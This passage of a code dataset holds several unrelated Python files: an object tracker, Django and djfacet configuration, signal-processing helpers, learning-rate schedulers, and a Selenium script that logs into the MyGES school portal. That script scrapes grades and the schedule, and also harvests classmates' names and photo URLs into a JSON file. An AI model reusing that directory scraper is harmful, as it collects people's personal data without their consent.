Use 'make load' to load bitstream to device.\")\n\n # TODO\n #top_level_cli(design)\n","repo_name":"greatscottgadgets/luna-soc","sub_path":"examples/hello-c/top.py","file_name":"top.py","file_ext":"py","file_size_in_byte":4968,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"96"} +{"seq_id":"13299053246","text":"import numpy as np\nimport cv2\n\n# divide 256 gray scale into 64 bin from 0-63\n\ndef gray_64bin():\n bin = []\n count = 0\n\n for i in range(0,64):\n while(count<4):\n bin.append(i)\n\n count = count+1\n count = 0\n\n #print(bin)\n return bin\ndef gray_32bin():\n bin = []\n count = 0\n for i in range(0,32):\n while(count<8):\n bin.append(i)\n count = count+1\n count = 0\n return bin\ndef gray_16bin():\n bin = []\n count = 0\n for i in range(0,16):\n while(count<16):\n bin.append(i)\n count = count+1\n count = 0\n return bin\n#print(gray_64bin())\n\ndef gray_bin():\n bin = []\n count = 0\n bin_num = 0\n for i in range(0,256):\n\n bin.append(i)\n #count = count+1\n #count = 0\n bin_num+=1\n #print(bin)\n return bin\n\ndef RGB_empty_hist():\n hist = []\n for i in range(0,4096):\n hist.append(0)\n #print(len(hist))\n return hist\n\n#use rgb to get hist\ndef color_hist(img):\n h = img.shape[0]\n w = img.shape[1]\n hist = RGB_empty_hist()\n band = pow(1, 2) + pow(1, 2)\n wei_c = []\n for i in range(0,h):\n for j in range(0,w):\n # 分别给红绿蓝 分成 16 个 bin\n # 再把每个红绿蓝带权重的分成4096个bin\n qr = img[i][j][0]/16\n qg = img[i][j][1]/16\n qb = img[i][j][2]/16\n q_temp = qr*239+qg*16+qb\n print(q_temp)\n q_temp = np.around(q_temp).astype(int)\n print(i)\n # 求出每个点离中心的距离作为mask\n dist = pow(i - 1, 2) + pow(j - 1, 2)\n wei = 1 - dist / band\n wei_c.append(wei)\n hist[q_temp]=hist[q_temp]+wei\n C = sum(wei_c)\n hist = [c_bin / C for c_bin in hist]\n return hist\n#print(gray_bin())\n\ndef empty_hist():\n hist = []\n for i in range(0,16):\n hist.append(0)\n #print(len(hist))\n return hist\n# 灰度图的直方图\ndef get_hist(img):\n h = img.shape[0]\n w = img.shape[1]\n #print(\"wh in hist\",w,h)\n\n bin = gray_16bin();\n hist = empty_hist()\n c_x = w/2\n c_y = h/2\n wei_c = []\n band = pow(c_x,2)+ pow(c_y,2)\n\n for col in range(0,h):\n for row in range(0,w):\n color = img[col][row]\n #print(color)\n color_bin = bin[color]\n #print(color_bin)\n dist = pow(col-c_y,2)+pow(row-c_x,2)\n wei = 1-dist/band\n wei_c.append(wei)\n hist[color_bin] = hist[color_bin] + wei\n C = sum(wei_c)\n #print('c',C)\n #normalize hist\n if C == 0:\n C = 1\n hist=[c_bin / C for c_bin in hist]\n #print(len(hist))\n return hist\n\ndef get_similarity(hist1,hist2):\n similar = []\n for i in (range(0,16)):\n if hist2[i] != 0:\n temp = hist1[i]/hist2[i]\n simi = np.sqrt(temp)\n\n similar.append(simi)\n else :\n similar.append(0)\n #print(similar)\n return similar\n\ndef meanshift_step(roi,roi_window,hist1,img):\n # 1 calculate h2\n # 2 calculate similarity\n # 3 ca/culate new center\n box_cx, box_cy, box_w, box_h = roi_window\n #print(box_w,box_h)\n #len = len(roi)\n\n len = box_h*box_w\n\n #print('roiwindow',roi_window)\n num = 0\n sim = []\n # box_cx = box.x\n # box_cy = box.y\n # box_h = box.shape[0]\n # box_w = box.shape[1]\n #x_shift = 0\n #y_shift = 0\n sum_w = 0\n # calcuate the hist2\n\n # caculate 2 simularity\n # similarity = get_similarity(hist1,hist2)\n #print(\"simi\",similarity)\n # caculate new center\n while (num < 50):\n #print(num)\n x_shift = 0\n y_shift = 0\n sum_w = 0\n\n\n #print('ce?',box_cx,box_cy)\n\n hist2 = get_hist(roi)\n bin = gray_16bin()\n\n similarity = get_similarity(hist1, 
hist2)\n # 测试每一步的近似度是否在变大\n\n # s_mean=np.mean(similarity)\n # sim.append(s_mean)\n #print(\"simi\", similarity)\n num = num+1\n for col in range(0, box_h):\n for row in range(0,box_w):\n color = roi[col][row]\n color_bin = bin[color]\n # 计算normalize 的 底\n sum_w = sum_w + similarity[color_bin]\n\n # version 2 老师版本\n #x_shift = row*similarity[color_bin]+x_shift\n #print(\"loop of x_shift\",x_shift)\n #y_shift = col*similarity[color_bin]+y_shift\n\n #version 1\n\n y_shift = y_shift + similarity[color_bin]*(col-box_h/2)\n x_shift = x_shift + similarity[color_bin]*(row-box_w/2)\n\n #print(\"step shift\",x_shift,y_shift)\n\n #print('before nol',x_shift,y_shift)\n #shift distance\n\n #shift version 1\n if sum_w == 0:\n sum_w = 1\n # 我们的normaleze\n y_shift = y_shift/sum_w\n x_shift = x_shift/sum_w\n\n #print(\"firstshift\", x_shift, y_shift)\n\n #print('beforeshift',box_cx,box_cy)\n #new center version 1\n\n #\n box_cx = box_cx + x_shift*1.69\n box_cy = box_cy + y_shift*1.69\n\n #老师版本的normalize\n\n # box_cx = x_shift/len\n # box_cy = y_shift/len\n\n box_cx = np.around(box_cx)\n box_cx = box_cx.astype(int)\n box_cy = np.around(box_cy)\n box_cy = box_cy.astype(int)\n #print('centerx',box_cx,box_cy)\n\n #test change x and y\n roi = img[box_cy:box_cy + box_h, box_cx:box_cx + box_w]\n\n #show\n\n # l=np.around(box_cx + box_w / 2 - 3)\n # t=np.around(box_cy - box_h / 2 + 3)\n # r=np.around(box_cx + box_w / 2 +3)\n # b=np.around(box_cy - box_h / 2 - 3)\n # #tracking way\n # print((l,t))\n # im = cv2.rectangle(img, (box_cx, box_cy), (box_cx + box_w, box_cy + box_h), 255, 2)\n # #im = cv2.rectangle(img, (l,t), (r,b), 255)\n #\n # cv2.imshow('Video', im)\n # cv2.waitKey(0)\n\n #roi = img[box_cx:box_cx + box_h, box_cy:box_cy + box_w]\n #print(roi.shape)\n\n #print(num)\n\n\n # print(\"final\",box_cx,box_cy)\n\n return box_cx,box_cy","repo_name":"TheonHuang/object_tracking","sub_path":"build_bin.py","file_name":"build_bin.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"96"} +{"seq_id":"23275571868","text":"##################\n# THIS IS JUST AN EXAMPLE OF THE FACETSPECS.PY FILE THAT YOU NEED TO CREATE IN ORDER TO\n# CONFIGURE THE FACETED BROWSER\n# \n# THE SPECS FILE NEEDS TO BE LOCATED AT THE ROOT LEVEL OF YOUR PROJECT \n# (I.E., WHERE YOU HAVE THE SETTINGS.PY FILE)\n# \n# MORE INFO AVAILABLE AT: http://www.michelepasin.org/support/djfacet/docs/configuration.html\n##################\n\n\n\nfrom myproject.mymodels import *\n\n\n\n##################\n# \n# RESULT_TYPES and FACET_GROUPS\n#\n##################\n\n\n\nfacetslist = []\n\n\n\n\n#\tlabel = interface name / uniquename = internal name / infospace: a Model or a QuerySet instance\nresult_types\t = [{\t'label' : 'Religions', \n\t\t\t\t\t\t'uniquename' : 'religions', \n\t\t\t\t\t\t'infospace' : Religion\t,\n\t\t\t\t\t\t'isdefault' : True\n\t\t\t\t\t\t },\n\t\t\t\t\t\t\n\t\t\t\t\t {\t'label' : 'Countries', \n\t\t\t\t\t\t'uniquename' : 'country', \n\t\t\t\t\t\t'infospace' : Country,\n\t\t\t\t\t\t\t},\n\n\t\t\t\t\t]\n\t\t\t \n\nfacet_groups =\t\t[{\t'label':\t'Place facets', \n\t\t\t\t\t\t'position': 1,\n\t\t\t\t\t\t'uniquename' :\t'countrygroup', \n\t\t\t\t\t\t'default' : True , \n\t\t\t\t\t\t'bkcolor' : 'FFEEFF' } ,\n\t\t\t\t\t\t\n\t\t\t\t\t{\t'label':\t'Religion facets', \n\t\t\t\t\t\t'position': 2,\n\t\t\t\t\t\t'uniquename' :\t'religiongroup', \n\t\t\t\t\t\t'default' : True ,\n\t\t\t\t\t\t'bkcolor' : \"EEFFFF\"} ,\n\t\t\t\t\t]\n\n\n\n\n\n\n##################\n# \n# 
FACETS\n#\n##################\n\n\nfacetslist +=\t[ \n\n\t\t\t{\t'appearance' : {'label' : 'Region name' , \n\t\t\t\t\t\t\t\t'uniquename' : 'regionname',\n\t\t\t\t\t\t\t\t'model' : Region , \n\t\t\t\t\t\t\t\t'dbfield' : \"name\", \n\t\t\t\t\t\t\t\t'displayfield' : \"name\", \n\t\t\t\t\t\t\t\t'explanation': \"no explanation yet\", # TODO: add explanations to all of them!\n\t\t\t\t\t\t\t\t'grouping'\t: ['countrygroup'],\n\t\t\t\t\t\t\t\t'ordering' : 'name',\n\t\t\t\t\t\t\t\t} ,\n\t\t\t\t'behaviour' : [{'resulttype' : 'religions',\n\t\t\t\t\t\t\t\t 'querypath' : 'country__inregion__name', \n\t\t\t\t\t\t\t\t 'inversepath' : None,\n\t\t\t\t\t\t\t\t 'explanation' : \"showing all....\" },\n\t\t\t\t\t\t\t\t{'resulttype' : 'country',\n\t\t\t\t\t\t\t\t 'querypath' : 'inregion__name', \n\t\t\t\t\t\t\t\t 'inversepath' : None,\n\t\t\t\t\t\t\t\t 'explanation' : \"showing all....\" },\n\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\t },\n\t\t\t\t\t\t\t\t\t\n\n\n\t\t\t{\t'appearance' : {'label' : 'Region idbname' , \n\t\t\t\t\t\t\t\t'uniquename' : 'regionidbname',\n\t\t\t\t\t\t\t\t'model' : Region , \n\t\t\t\t\t\t\t\t'dbfield' : \"idbname\", \n\t\t\t\t\t\t\t\t'displayfield' : \"idbname\", \n\t\t\t\t\t\t\t\t'explanation': \"no explanation yet\", # TODO: add explanations to all of them!\n\t\t\t\t\t\t\t\t'grouping'\t: ['countrygroup'],\n\t\t\t\t\t\t\t\t'ordering' : 'idbname',\n\t\t\t\t\t\t\t\t} ,\n\t\t\t\t'behaviour' : [{'resulttype' : 'religions',\n\t\t\t\t\t\t\t\t 'querypath' : 'country__inregion__idbname', \n\t\t\t\t\t\t\t\t 'inversepath' : None,\n\t\t\t\t\t\t\t\t 'explanation' : \"showing all....\" },\n\t\t\t\t\t\t\t\t{'resulttype' : 'country',\n\t\t\t\t\t\t\t\t 'querypath' : 'inregion__idbname', \n\t\t\t\t\t\t\t\t 'inversepath' : None,\n\t\t\t\t\t\t\t\t 'explanation' : \"showing all....\" },\n\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\t },\n\n\t\t\t{\t'appearance' : {'label' : 'Country name' , \n\t\t\t\t\t\t\t\t'uniquename' : 'countryname',\n\t\t\t\t\t\t\t\t'model' : Country , \n\t\t\t\t\t\t\t\t'dbfield' : \"name\", \n\t\t\t\t\t\t\t\t'displayfield' : \"name\", \n\t\t\t\t\t\t\t\t'explanation': \"no explanation yet\", # TODO: add explanations to all of them!\n\t\t\t\t\t\t\t\t'grouping'\t: ['countrygroup'],\n\t\t\t\t\t\t\t\t'ordering' : 'name',\n\t\t\t\t\t\t\t\t} ,\n\t\t\t\t'behaviour' : [{'resulttype' : 'religions',\n\t\t\t\t\t\t\t\t 'querypath' : 'country__name', \n\t\t\t\t\t\t\t\t 'inversepath' : None,\n\t\t\t\t\t\t\t\t 'explanation' : \"showing all....\" },\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t# NOTE THAT THIS FACET WILL NOT WORK WITH COUNTRIES!\n\t\t\t\t\t\t\t\t# ...if it did.. 
it could look like this:\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\t\t# {'resulttype' : 'country',\n\t\t\t\t\t\t\t\t# 'querypath' : 'name', \n\t\t\t\t\t\t\t\t# 'inversepath' : None,\n\t\t\t\t\t\t\t\t# 'explanation' : \"showing all....\" },\n\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\t },\n\t\t\t\t\t\t\n\t\t\t\t\t\t\n\t\t\t\t# THIS IS AN MPTT/HIERARCHICAL FACET\t\t\n\n\t\t\t\t{\t'mptt' : True,\n\t\t\t\t\t'appearance' : {'label' : 'Religion name' , \n\t\t\t\t\t\t\t\t\t'uniquename' : 'religionname',\n\t\t\t\t\t\t\t\t\t'model' : Religion , \n\t\t\t\t\t\t\t\t\t'dbfield' : \"name\", \n\t\t\t\t\t\t\t\t\t'displayfield' : \"name\", \n\t\t\t\t\t\t\t\t\t'explanation': \"no explanation yet\", # TODO: add explanations to all of them!\n\t\t\t\t\t\t\t\t\t'grouping'\t: ['religiongroup'],\n\t\t\t\t\t\t\t\t\t'ordering' : 'name',\n\t\t\t\t\t\t\t\t\t} ,\n\t\t\t\t\t'behaviour' : [{'resulttype' : 'religions',\n\t\t\t\t\t\t\t\t\t 'querypath' : 'name', \n\t\t\t\t\t\t\t\t\t 'inversepath' : None,\n\t\t\t\t\t\t\t\t\t 'explanation' : \"showing all....\" },\n\t\t\t\t\t\t\t\t\t{'resulttype' : 'country',\n\t\t\t\t\t\t\t\t\t 'querypath' : 'religions__name', \n\t\t\t\t\t\t\t\t\t 'inversepath' : None,\n\t\t\t\t\t\t\t\t\t 'explanation' : \"showing all....\" },\n\t\t\t\t\t\t\t\t\t]\n\t\t\t\t\t\t\t },\n\n\t\t\n\t\t\t\t\t\t\n\t\t\t\t\t\t#\tend of facet_list\n\t\t\t\t\t\t\t\t]\n\n\n\n\n\n","repo_name":"lambdamusic/djfacet","sub_path":"djfacet/facetspecs_example.py","file_name":"facetspecs_example.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"23073827343","text":"from dataclasses import fields\nfrom django import forms\nfrom django.forms import ModelForm\nfrom .models import Album\n\nclass CreateAlbumForm(ModelForm):\n class Meta:\n model = Album\n fields = [\n 'name',\n 'artist',\n 'release_datetime',\n 'cost',\n 'is_approved'\n ]\n widgets = {\n 'release_datetime': forms.DateInput(format=('%m/%d/%Y'), attrs={'type':'date'}),\n }","repo_name":"TarekMGamal/Music-Platform","sub_path":"albums/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"9114978875","text":"\"\"\"\r\nGiven an array of integers, return indices of the two numbers such that \r\nthey add up to a specific target.\r\n\r\nYou may assume that each input would have exactly one solution, \r\nand you may not use the same element twice.\r\n\r\n\r\nIntuition:\r\ngoal: we have to find 2 numbers in the list that make up the target.\r\nAs we pass by each elem, we store the difference in the hash table for \r\nfaster retrieval of the other pair \r\n\r\n\r\nStore the elem as the key; Store the difference as the value\r\nCheck if next number is within the Hash Table that matches the key (The next number MUST equal the DIFFERENCE when checked, otherwise edge cases like 22-11=11 would equal itself and hence the duplicate value);\r\nif so, return the value for that key.\r\n\r\n[2, 7, 11, 15], target = 22\r\n[2,7,11,15], 9\r\n\"\"\"\r\n\r\nclass Solution:\r\n def twoSum(self, nums, target):\r\n\r\n store={}\r\n for i in range(len(nums)):\r\n difference = target - nums[i]\r\n # this will avoid returnning the same value, in the edge case where elem is 11\r\n if nums[i] not in store.values():\r\n store[nums[i]] = difference\r\n else:\r\n # if the current elem(15) is equal to the difference in store\r\n # return the corresponding index from nums using the value stored 
in dictionary\r\n return [nums.index(difference), i]\r\n \r\n # print(store)\r\n \r\n# Solution().twoSum([2, 7, 11, 15],22)\r\nprint(Solution().twoSum([2,7,11,15],9)) ","repo_name":"ZBr14n/Algorithms-Data-Structures-in-Python","sub_path":"python files_part2/twoSum.py","file_name":"twoSum.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"25543330689","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 3 14:07:36 2018\n\n@author: Vincent STRAGIER\n\"\"\"\n__author__ = 'Vincent STRAGIER'\n\n# For file import\nfrom scipy.io.wavfile import read\nfrom os import listdir\nfrom os.path import isfile, join\n\n# For maths\nimport numpy as np\nimport matplotlib.mlab as mlab # To use xcorr without pyplot\n\n# Import all the files in a directory\ndef wav_import_all(directory_path):\n samples_set = []\n sampling_frequencies = []\n filenames = [f for f in listdir(directory_path) if isfile(join(directory_path, f))]\n \n for i in range(len(filenames)):\n samples = read((str(directory_path)+ \"/\" + filenames[i]))\n samples_set.append(np.array(samples[1],np.float))\n sampling_frequencies.append(np.array(samples[0],np.float))\n \n return samples_set, sampling_frequencies, filenames\n\n# Normalize samples\ndef normalize(samples):\n return np.divide(samples, np.amax(np.absolute(samples)))\n\ndef splicer(samples, width, shifting_step, frequency):\n frames = []\n \n sampling_frequency = frequency/1000\n numeric_width = abs(int(width*sampling_frequency))\n numeric_shifting_step = abs(int(shifting_step*sampling_frequency))\n test_configuration = numeric_shifting_step-numeric_width\n \n # Determine the number of iteration to apply\n if test_configuration > 0:\n number_of_iterations = (len(samples)-numeric_width)/(test_configuration)\n elif test_configuration == 0:\n number_of_iterations = len(samples)/numeric_width\n else:\n number_of_iterations = -(len(samples)-numeric_width)/(test_configuration)\n\n # Split in frames\n for j in range(int(number_of_iterations)):\n frames.append(np.split(samples, [j*numeric_shifting_step, j*numeric_shifting_step + numeric_width])[1])\n \n return frames\n\n# Return the energy of each frame\ndef signal_energy(frames):\n temp = []\n for i in range(len(frames)):\n temp.append(np.sum(np.square(frames[i])))\n return temp\n\n# xcorr without the pyplot submodule ('junk')\ndef xcorr(x, y, normed=True, detrend=mlab.detrend_none, usevlines=True, maxlags=10, **kwargs):\n Nx = len(x)\n if Nx != len(y):\n raise ValueError('x and y must be equal length')\n\n x = detrend(np.asarray(x))\n y = detrend(np.asarray(y))\n\n c = np.correlate(x, y, mode=2)\n\n if normed:\n c /= np.sqrt(np.dot(x, x) * np.dot(y, y))\n\n if maxlags is None:\n maxlags = Nx - 1\n\n if maxlags >= Nx or maxlags < 1:\n raise ValueError('maglags must be None or strictly '\n 'positive < %d' % Nx)\n\n lags = np.arange(-maxlags, maxlags + 1)\n c = c[Nx - 1 - maxlags:Nx + maxlags]\n\n return lags, c\n\n# Return the pitch on each voiced frames calculeted with numpy\ndef pitch_voiced_autocorr(frames, sampling_frequency, threshold = 0.3):\n energy_of_each_frames = signal_energy(frames)\n \n # Convert frenquencies in number of samples\n maxlag = int(sampling_frequency/50.0)\n lag_min = int(sampling_frequency/500.0)\n lag_max = int(sampling_frequency/60.0)\n \n index = []\n pitch = []\n autocorr = 0\n \n for i in range(len(energy_of_each_frames)):\n if energy_of_each_frames[i] >= threshold:\n # Compute the autocorrelation of the 
voiced frame with maxlag = 50 Hz\n autocorr = xcorr(frames[i], frames[i], maxlags=maxlag)[1]\n \n # Use only the upper side of the autocorrelation to compute de pitch\n upper_side = autocorr[int(len(autocorr)/2):]\n \n # Find the first peak between 60 Hz and 500 Hz\n index_ = np.argmax(upper_side[lag_min:lag_max])\n \n # Unbiase the index of the peak\n index_ += lag_min\n \n # Compute the picth frequency\n pitch.append(sampling_frequency/index_)\n # print(pitch[i])\n \n # Correct the index to display it on the full plot\n index.append(index_+int(len(autocorr)/2))\n \n else:\n # Correct the temporality of the vector\n pitch.append(0)\n index.append(0)\n \n return np.array(pitch, np.float), index\n\nif __name__ == \"__main__\":\n print(\"This script is a Python 3 module for the Signal Processing project.\")\n","repo_name":"Vincent-Stragier/Signal_Processing_MA1_FPMS_UMONS","sub_path":"ts_project_s_lib_opti.py","file_name":"ts_project_s_lib_opti.py","file_ext":"py","file_size_in_byte":4364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"32559716868","text":"import json\nimport os\nimport time\nimport codecs\nfrom dotenv import load_dotenv\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\n\nfrom selenium.webdriver.support.wait import WebDriverWait\n\nload_dotenv()\nusername_value = os.getenv(\"ID\")\npassword_value = os.getenv(\"PASSWORD\")\n\nfirefox_options = webdriver.FirefoxOptions()\ndriver = webdriver.Firefox(options=firefox_options)\n\ndriver.get(\"https://ges-cas.kordis.fr/login\")\n\nusername = driver.find_element(By.CSS_SELECTOR, \"input[name='username']\")\npassword = driver.find_element(By.CSS_SELECTOR, \"input[name='password']\")\n\nusername.send_keys(username_value)\npassword.send_keys(password_value)\n\ndriver.find_element(By.CSS_SELECTOR, \"input[name='submit']\").click()\n\ndriver.get(\"https://myges.fr/student/student-directory\")\n\ntime.sleep(2)\n\n\ndef planning():\n driver.get(\"https://myges.fr/student/planning-calendar\")\n\n wait = WebDriverWait(driver, 10)\n\n is_planning_present = True\n click_count = 0\n planning_data = []\n while click_count < 4 and is_planning_present:\n try:\n # Cliquez sur la flèche de droite\n driver.find_element(By.ID, \"calendar:nextMonth\").click()\n\n # Attendez que le chargement soit terminé\n wait.until(EC.invisibility_of_element_located((By.CSS_SELECTOR, \"span.mg_loadingbar_text\")))\n\n # Vérifiez si l'élément spécifique est présent dans la semaine de l'emploi du temps\n planning = driver.find_elements(By.CSS_SELECTOR, \"div.fc-event-inner\")\n print(planning)\n click_count += 1\n if not len(planning) == 0:\n is_planning_present = False\n print(\"La recherche du planning a été effectuée avec succès.\")\n print(\"-------------------------------------------------\")\n\n last_end_time = \"\" # Initialisez last_end_time\n\n for element in planning:\n title_element = element.find_element(By.CSS_SELECTOR, \"div.fc-event-title\")\n time_element = element.find_element(By.CSS_SELECTOR, \"div.fc-event-time\")\n title = title_element.text.strip()\n time = time_element.text.strip()\n\n current_end_time = time.split(\" - \")[1] # Récupérer l'heure de fin du cours actuel\n\n if last_end_time and current_end_time > last_end_time:\n print() # Ajouter un espace entre les jours\n\n print(\"| {:<30} | {:<12} |\".format(title, time))\n\n last_end_time = time.split(\" - \")[\n 1] # Mettre à jour 
last_end_time avec l'heure de fin du cours actuel\n for element in planning:\n title_element = element.find_element(By.CSS_SELECTOR, \"div.fc-event-title\")\n time_element = element.find_element(By.CSS_SELECTOR, \"div.fc-event-time\")\n title = title_element.text.strip()\n time = time_element.text.strip()\n planning_data.append({\"Title\": title, \"Time\": time}) # Ajoutez les données du cours à la liste\n print(\"-------------------------------------------------\")\n planning_json = json.dumps(planning_data)\n\n # Imprimez la représentation JSON\n print(planning_json)\n with codecs.open(\"planning.json\", \"w\", \"utf-8\") as file:\n file.write(planning_json)\n else:\n print(\"Aucun planning n'a été trouvé dans la semaine.\")\n except Exception as e:\n print(e)\n is_planning_present = False\n break\n\ndef notes():\n driver.get(\"https://myges.fr/student/marks\")\n\n # Récupération des en-têtes de colonne\n headers = driver.find_elements(By.CSS_SELECTOR, \".mg_content table thead th\")\n\n # Récupération des valeurs des colonnes de données\n rows = driver.find_elements(By.CSS_SELECTOR, \".mg_content table tbody tr\")\n\n data_list = []\n for row in rows:\n # Création d'un dictionnaire pour stocker les valeurs de chaque ligne\n data_dict = {}\n\n # Parcours des cellules de la ligne\n cells = row.find_elements(By.CSS_SELECTOR, \"td\")\n for i, cell in enumerate(cells):\n # Vérification si l'indice dépasse la longueur des en-têtes\n if i >= len(headers):\n break\n\n # Récupération du nom d'en-tête et de la valeur de la cellule correspondante\n header = headers[i].text.strip()\n value = cell.text.strip()\n\n # Ajout de la paire clé-valeur dans le dictionnaire\n data_dict[header] = value\n\n # Ajout du dictionnaire à la liste des données\n data_list.append(data_dict)\n\n # Conversion de la liste en JSON\n notes_json = json.dumps(data_list)\n\n # Imprimer la représentation JSON\n print(notes_json)\n\n # Écriture des données JSON dans un fichier\n with codecs.open(\"notes.json\", \"w\", \"utf-8\") as file:\n file.write(notes_json)\n\n\ndef eleves():\n driver.get(\"https://myges.fr/student/student-directory\")\n\n # Récupération de tous les champs de texte dans la div\n data_list = []\n while True:\n # Parcours des champs de texte et récupération des noms et des images\n elements = driver.find_elements(By.CSS_SELECTOR, \".mg_content .mg_directory_block_container\")\n for element in elements:\n name_element = element.find_element(By.CSS_SELECTOR, \".mg_directory_text\")\n image_element = element.find_element(By.CSS_SELECTOR, \".mg_directory_container img\")\n name = name_element.text\n image_url = image_element.get_attribute(\"src\")\n data_list.append({\"name\": name, \"image\": image_url})\n\n # Recherche du bouton \"Suivant\" pour passer à la page suivante\n next_button = driver.find_element(By.CSS_SELECTOR, \".ui-paginator-next\")\n if \"ui-state-disabled\" in next_button.get_attribute(\"class\"):\n # Si le bouton \"Suivant\" est désactivé, on sort de la boucle\n break\n else:\n # Sinon, on clique sur le bouton \"Suivant\" pour passer à la page suivante\n next_button.click()\n # Attente pour laisser le temps à la page suivante de se charger\n time.sleep(2)\n\n # Conversion de la liste en JSON\n eleves_json = json.dumps(data_list, ensure_ascii=False)\n\n # Affichage de la représentation JSON\n print(eleves_json)\n\n # Écriture des données JSON dans un fichier UTF-8\n with codecs.open(\"eleves.json\", \"w\", \"utf-8\") as file:\n 
file.write(eleves_json)\n\n#planning()\nnotes()\n#eleves()\n\n\ndriver.quit()","repo_name":"SamEPK/pythonGes","sub_path":"login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":6815,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"20800341501","text":"import math\nfrom torch.optim.lr_scheduler import MultiStepLR, _LRScheduler\nimport torch\n\n\nclass WarmupMultiStepLR(MultiStepLR):\n def __init__(self, optimizer, milestones, gamma=0.1, warmup_factor=1.0 / 3,\n warmup_iters=500, last_epoch=-1):\n self.warmup_factor = warmup_factor\n self.warmup_iters = warmup_iters\n super().__init__(optimizer, milestones, gamma, last_epoch)\n\n def get_lr(self):\n if self.last_epoch <= self.warmup_iters:\n alpha = self.last_epoch / self.warmup_iters\n warmup_factor = self.warmup_factor * (1 - alpha) + alpha\n # print(self.base_lrs[0]*warmup_factor)\n return [lr * warmup_factor for lr in self.base_lrs]\n else:\n lr = super().get_lr()\n return lr\n\n\nclass WarmupCosineLR(_LRScheduler):\n def __init__(self, optimizer, T_max, warmup_factor=1.0 / 3, warmup_iters=500,\n eta_min=0, last_epoch=-1):\n self.warmup_factor = warmup_factor\n self.warmup_iters = warmup_iters\n self.T_max, self.eta_min = T_max, eta_min\n super().__init__(optimizer, last_epoch)\n\n def get_lr(self):\n if self.last_epoch <= self.warmup_iters:\n alpha = self.last_epoch / self.warmup_iters\n warmup_factor = self.warmup_factor * (1 - alpha) + alpha\n # print(self.base_lrs[0]*warmup_factor)\n return [lr * warmup_factor for lr in self.base_lrs]\n else:\n return [self.eta_min + (base_lr - self.eta_min) *\n (1 + math.cos(\n math.pi * (self.last_epoch - self.warmup_iters) / (self.T_max - self.warmup_iters))) / 2\n for base_lr in self.base_lrs]\n\n\n\nclass WarmupPolyLR(_LRScheduler):#https://blog.csdn.net/sinat_36618660/article/details/99650804\n def __init__(self, optimizer, T_max, cur_iter, warmup_factor=1.0 / 3, warmup_iters=5,\n eta_min=0, power=0.9):\n\n self.warmup_factor = warmup_factor\n self.warmup_iters = warmup_iters\n self.power = power\n self.T_max, self.eta_min = T_max, eta_min\n self.cur_iter = cur_iter\n super().__init__(optimizer)\n\n def get_lr(self):#从最初的小学习率开始,每个step增大一点点,直到达到最初设置的比较大的学习率时,采用最初设置的学习率进行训练。\n if self.cur_iter <= self.warmup_iters:\n alpha = self.cur_iter / self.warmup_iters\n warmup_factor = self.warmup_factor * (1 - alpha) + alpha\n # print(self.base_lrs[0]*warmup_factor)\n return [lr * warmup_factor for lr in self.base_lrs]\n else:\n return [self.eta_min + (base_lr - self.eta_min) *\n math.pow(1 - (self.cur_iter - self.warmup_iters) / (self.T_max - self.warmup_iters),\n self.power) for base_lr in self.base_lrs]\n\n\ndef poly_learning_rate(cur_epoch, max_epoch, curEpoch_iter, perEpoch_iter, baselr):\n cur_iter = cur_epoch * perEpoch_iter + curEpoch_iter\n max_iter = max_epoch * perEpoch_iter\n lr = baselr * pow((1 - 1.0 * cur_iter / max_iter), 0.9)\n\n return lr\n\n\n\nclass GradualWarmupScheduler(_LRScheduler):\n \"\"\" Gradually warm-up(increasing) learning rate in optimizer.\n Proposed in 'Accurate, Large Minibatch SGD: Training ImageNet in 1 Hour'.\n Args:\n optimizer (Optimizer): Wrapped optimizer.\n min_lr_mul: target learning rate = base lr * min_lr_mul\n total_epoch: target learning rate is reached at total_epoch, gradually\n after_scheduler: after target_epoch, use this scheduler(eg. 
ReduceLROnPlateau)\n \"\"\"\n\n def __init__(self, optimizer, total_epoch, min_lr_mul=0.1, after_scheduler=None):\n self.min_lr_mul = min_lr_mul\n if self.min_lr_mul > 1. or self.min_lr_mul < 0.:\n raise ValueError('min_lr_mul should be [0., 1.]')\n self.total_epoch = total_epoch\n self.after_scheduler = after_scheduler\n self.finished = False\n super(GradualWarmupScheduler, self).__init__(optimizer)\n\n def get_lr(self):\n if self.last_epoch > self.total_epoch:\n if self.after_scheduler:\n if not self.finished:\n self.after_scheduler.base_lrs = self.base_lrs\n self.finished = True\n return self.after_scheduler.get_lr()\n else:\n return self.base_lrs\n else:\n return [base_lr * (self.min_lr_mul + (1. - self.min_lr_mul) * (self.last_epoch / float(self.total_epoch))) for base_lr in self.base_lrs]\n\n def step(self, epoch=None):\n if self.finished and self.after_scheduler:\n return self.after_scheduler.step(epoch - self.total_epoch)\n else:\n return super(GradualWarmupScheduler, self).step(epoch)\n\nclass WarmupLrScheduler(torch.optim.lr_scheduler._LRScheduler):\n\n def __init__(\n self,\n optimizer,\n warmup_iter=500,\n warmup_ratio=5e-4,\n warmup='exp',\n last_epoch=-1,\n ):\n self.warmup_iter = warmup_iter\n self.warmup_ratio = warmup_ratio\n self.warmup = warmup\n super(WarmupLrScheduler, self).__init__(optimizer, last_epoch)\n\n def get_lr(self):\n ratio = self.get_lr_ratio()\n lrs = [ratio * lr for lr in self.base_lrs]\n return lrs\n\n def get_lr_ratio(self):\n if self.last_epoch < self.warmup_iter:\n ratio = 